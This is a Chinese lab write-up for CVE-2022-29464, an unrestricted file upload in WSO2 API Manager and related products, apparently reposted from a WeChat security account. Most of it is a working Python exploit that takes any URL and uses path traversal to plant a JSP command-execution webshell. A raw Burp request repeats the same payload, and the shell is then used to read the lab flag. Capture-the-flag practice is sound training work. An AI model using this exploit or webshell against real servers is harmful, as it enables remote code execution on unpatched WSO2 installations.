云镜靶场
一、漏洞描述
某些WSO2产品允许不受限制地上传文件,从而执行远程代码。以WSO2 API Manager 为例,它是一个完全开源的 API 管理平台。它支持API设计,API发布,生命周期管理,应用程序开发,API安全性,速率限制,查看API的统计信息,以及连接API,API产品和端点。
二、漏洞影响版本
2.2.0 ≤ WSO2 API Manager ≤ 4.0.0
5.2.0 ≤ WSO2 Identity Server ≤ 5.11.0
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0
5.3.0 ≤ WSO2 Identity Server as Key Manager ≤ 5.10.0
6.2.0 ≤ WSO2 Enterprise Integrator ≤ 6.6.0
三.漏洞成因
参考链接:https://forum.butian.net/share/1518
四.漏洞复现
进入靶场
弱口令可直接进入后台
1.EXP利用
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = input("请输入URL:")
file = "shell.jsp"
payload = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")
使用如下:
访问webshell链接
直接执行命令 cat /flag
得到flag{6baadc7f-a2fa-4252-be29-1e64ea29ffbd}
2.利用burp
先访问https://eci-2zeejq36trw3c06lc5uf.cloudeci1.ichunqiu.com:9443/carbon/admin/login.jsp
我们需要到这个目录下面去,而不是默认打开的登录界面下 /carbon/admin/login.jsp
然后进行burp抓包,添加poc
POST /fileupload/toolsAny HTTP/1.1
Host: localhost:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 729
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"
<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--
抓包直接改包
出现下面的那个数字,代表着上传webshell成功
访问:/authenticationendpoint/1.jsp?cmd=system('cat /flag');
得到flag{6baadc7f-a2fa-4252-be29-1e64ea29ffbd}
cms源码:链接:https://pan.baidu.com/s/1OMfBUhV2U2teOZAUMIm3Rg?pwd=oc74 提取码:oc74
原文始发于微信公众号(XK Team):CVE-2022-29464
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论